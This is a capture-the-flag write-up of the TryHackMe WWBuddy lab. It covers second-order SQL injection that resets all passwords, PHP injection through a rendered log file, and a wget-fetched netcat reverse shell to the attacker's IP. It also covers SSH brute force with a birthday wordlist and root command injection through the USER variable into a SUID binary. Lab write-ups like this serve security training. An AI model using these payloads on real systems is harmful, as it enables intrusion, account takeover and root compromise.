Hello. I’m Rahmos. Here is my WWBuddy — TryHackMe — Writeup. Check it out!
First, deploy the machine and scan for open ports with nmap:
nmap -A -T4 -p- -v <ip>
Two ports are open: 22 (SSH) and 80 (HTTP).
Let’s first access the website:
It's a login page, but I don't have any credentials yet. Look at the room description:
So there are 2 pages where SQLi might be possible: /login and /register. I will use sqlmap to check for an SQLi vuln.
sqlmap -u http://<ip>/login --current-db --batch --cookie="PHPSESSID=your-SESSID" --forms --crawl=2
Neither /login nor /register looks vulnerable to sqlmap's automated tests. So let's find other hidden directories with gobuster:
gobuster dir -u http://<ip>/ -w /path-to-wordlist
One of the pages it finds tells me I don't have permission to view it. Let's get back to /login and try manual SQLi again.
First, I try admin : password
Ok so "no account". What about wwbuddy : password
Ah yes! Now I have found a username: WWBuddy. I tried injecting the password field with ' or 1=1 -- , URL-encoded, double-URL-encoded, base64-encoded, ... but none of it worked.
So let's sign up an account and log in to see what's inside. I will sign up an account admin : password
Ok so here’s what’s inside the website. Let’s try “Edit info”
I can change my username. Let's change the username to admin' or 1=1 -- -
Ok so the username has been changed. Now let's change the password.
To change a password, the backend has to tell the database whose password is being changed, and the only thing it has to identify me is the username stored in my session. Because I've changed my username to admin' or 1=1 -- -, and the backend seems to paste that value straight into the query, it will execute something like:
update <table-name> set password='<something>' where username = 'admin' or 1=1 -- -';
The -- comments out the closing quote, and or 1=1 is true for every row, so if this is right it will change every user's password to the one I choose. Let's change the password to "plapla"
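As an added illustration (this is not code from the writeup or from the WWBuddy room), the script below models that update against an in-memory SQLite table. The table name, column names and the seed users are assumptions; the injected username is the one used above. The vulnerable function concatenates the stored username into the UPDATE the way the reasoning above supposes the backend does, so every row gets the new password; the parameterised version treats the payload as plain data and changes only the attacker's own row.

```python
import sqlite3

# Constructed sample data standing in for the site's user table (assumed
# layout: a users table with username and password columns).
SEED_USERS = [
    ("WWBuddy", "secret1"),
    ("henry", "secret2"),
    ("roberto", "secret3"),
]

# The username the attacker set via "Edit info" before changing the password.
INJECTED_NAME = "admin' or 1=1 -- -"


def make_db():
    """Fresh in-memory database with the seed users plus the attacker's
    account, whose username has already been edited to the payload."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", SEED_USERS)
    db.execute("INSERT INTO users VALUES (?, ?)", (INJECTED_NAME, "password"))
    return db


def change_password_vulnerable(db, username, new_password):
    """Hypothetical reconstruction of the bug: the stored username is
    formatted into the SQL text (second-order injection). Returns the
    number of rows the UPDATE touched."""
    sql = "UPDATE users SET password='%s' WHERE username='%s'" % (
        new_password,
        username,
    )
    return db.execute(sql).rowcount


def change_password_safe(db, username, new_password):
    """Same operation with bound parameters; the quote and the -- in the
    username never reach the SQL parser."""
    cur = db.execute(
        "UPDATE users SET password=? WHERE username=?", (new_password, username)
    )
    return cur.rowcount


def passwords(db):
    """Map of username -> password, used to inspect the result."""
    return dict(db.execute("SELECT username, password FROM users"))


if __name__ == "__main__":
    vuln = make_db()
    print("vulnerable update touched", change_password_vulnerable(vuln, INJECTED_NAME, "plapla"), "rows")
    print(passwords(vuln))
    safe = make_db()
    print("parameterised update touched", change_password_safe(safe, INJECTED_NAME, "plapla"), "rows")
    print(passwords(safe))
```

The vulnerable query ends up as `UPDATE users SET password='plapla' WHERE username='admin' or 1=1 -- -'`: the `--` turns the dangling quote into a comment and `or 1=1` matches every row, which is exactly why logging in as WWBuddy with "plapla" works afterwards.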
The password has been changed. So now I'll try to log in as "WWBuddy" with the password "plapla"
Ah yes, it worked! Now I'm in as WWBuddy. Looking at the chatbox, there are 2 other users: Henry and Roberto. Maybe one of them is the admin? Let's try to log in as them with the same password.
First, start with henry. Look at the chat between him and Roberto:
Ok, now I know the default SSH password is the employee's birthday. Roberto has changed his default password, but maybe the girl who just joined as a new employee hasn't! So if I can get her birthday, I can log in over SSH.
Because Henry is the employer, he may be the admin as well. Let's access /admin:
Bingo! He is the admin. View the page source (Ctrl + U) and I've got the 1st web flag:
Take a look at the end of every line: there is a <br> to break the line, so the backend is probably rendering the log of failed attempts to access /admin with include() rather than echoing it as text. include() parses PHP tags in whatever file it loads, so let's see if PHP code placed in a logged username gets executed.
Logout of Henry, and login as wwbuddy. Change the username to:
<?php system('id') ?>
and then access /admin. After that, logout and login again as Henry, and access /admin again to see if anything happens.
The PHP code has been executed! So instead of "id", I will change the code to spawn a reverse shell. Because the username cannot exceed 50 characters, I will write a shell.sh on my machine and use PHP to wget it onto the target.
Content of shell.sh:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your-VPN-ip> 4444 >/tmp/f
Start an HTTP server on your machine:
python3 -m http.server 9000
python2 -m SimpleHTTPServer 9000
Then start a listener:
nc -lvnp 4444
Then change the username of wwbuddy to:
<?php system('wget http://<your-VPN-ip>:9000/shell.sh') ?>
Again, access /admin, log out, log in as Henry and access /admin.
The shell.sh has been transferred (you will see the request hit your HTTP server). Now change the username to execute shell.sh:
Doing the same steps above to exec this php code, and you will have the shell into the machine!
Spawn a tty shell using Python:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Let’s move around:
Ok so now I know the new employee's name is jenny. Her SSH password will be her birthday, but I haven't figured that out yet. Since MySQL is running on the box, there may be a MySQL log that records the queries (including any passwords passed in them). Let's look in /var/log:
There it is!
Read content of general.log:
I already know there's a user called "roberto". Let's su to him with this password.
And yes! Now I’m roberto!
Again, spawn a tty shell using Python, move around and get the 1st user.txt flag:
The rest of the file is not in English, so put it through a translator:
Ok so now I know jenny will turn 26 next week. Let's see when this file was created:
It was created on 27-07-2020. Next week Jenny turns 26, so her date of birth falls somewhere from 1 to 9 August 1994. Let's create a wordlist to bruteforce her SSH password, but remember the format the website uses: mm/dd/yyyy, so write each date in that format. Here is my example wordlist:
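Because the wordlist above is only shown as an image, here is an added Python script (not from the writeup) that generates it. The file date, the age of 26 and the 1 to 9 August window come from the reasoning above; the birth-year arithmetic (2020 - 26 = 1994), the `%m/%d/%Y` format string and the output filename jenny.txt are my assumptions about how to reproduce the site's mm/dd/yyyy format for hydra.

```python
from datetime import date, timedelta

# Values read off the box (see the reasoning above); the window is the
# generous one the writeup uses rather than a strict Monday-to-Sunday week.
FILE_DATE = date(2020, 7, 27)
AGE_NEXT_WEEK = 26
WINDOW_START = (8, 1)   # (month, day) of the first candidate birthday
WINDOW_END = (8, 9)     # (month, day) of the last candidate birthday

# Assumed: the site shows birthdays as mm/dd/yyyy, so that is the format
# the default SSH password should use.
SITE_FORMAT = "%m/%d/%Y"


def birth_year(observed_on, age_at_next_birthday):
    """If someone turns N next week, they were born in (this year - N)."""
    return observed_on.year - age_at_next_birthday


def candidate_birthdays(year, start, end, fmt=SITE_FORMAT):
    """Every calendar day from start to end (inclusive, as (month, day)
    tuples) in the given year, rendered with the site's date format."""
    d = date(year, *start)
    last = date(year, *end)
    out = []
    while d <= last:
        out.append(d.strftime(fmt))
        d += timedelta(days=1)
    return out


def write_wordlist(path, words):
    """One candidate per line, the layout hydra -P expects."""
    with open(path, "w") as fh:
        fh.write("\n".join(words) + "\n")
    return len(words)


if __name__ == "__main__":
    year = birth_year(FILE_DATE, AGE_NEXT_WEEK)
    words = candidate_birthdays(year, WINDOW_START, WINDOW_END)
    write_wordlist("jenny.txt", words)
    print("\n".join(words))
```

Running it writes nine lines, 08/01/1994 through 08/09/1994, into jenny.txt, which is the file passed to hydra below.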
Use hydra to bruteforce:
hydra -l jenny -P jenny.txt ssh://<ip>
Now I've found her password. Let's log in over SSH as jenny.
Jenny cannot run sudo on this machine either. Try another way: use find to look for binaries with the SUID bit set:
find / -perm -u=s 2>/dev/null
/bin/authenticate is not a default Linux command. So let's see what it does:
Ok so it adds jenny to the group developer and spawns a new shell. Let's transfer this file to our machine and use Ghidra to decompile it.
If you're already in the group "developer", it just prints "you are already a developer". But if you are not, it reads the environment variable "USER", sets the uid to 0 (root) and builds a usermod command from that value. So if I put a shell command in "USER", it will be executed as root!
export USER=';cat /root/root.txt;'
Why do I need the ; symbol? Because the program runs the "usermod" command through the shell with the value of USER appended, the ; ends that command and makes the shell execute my command (cat /root/root.txt) right after it.
Then exec /bin/authenticate: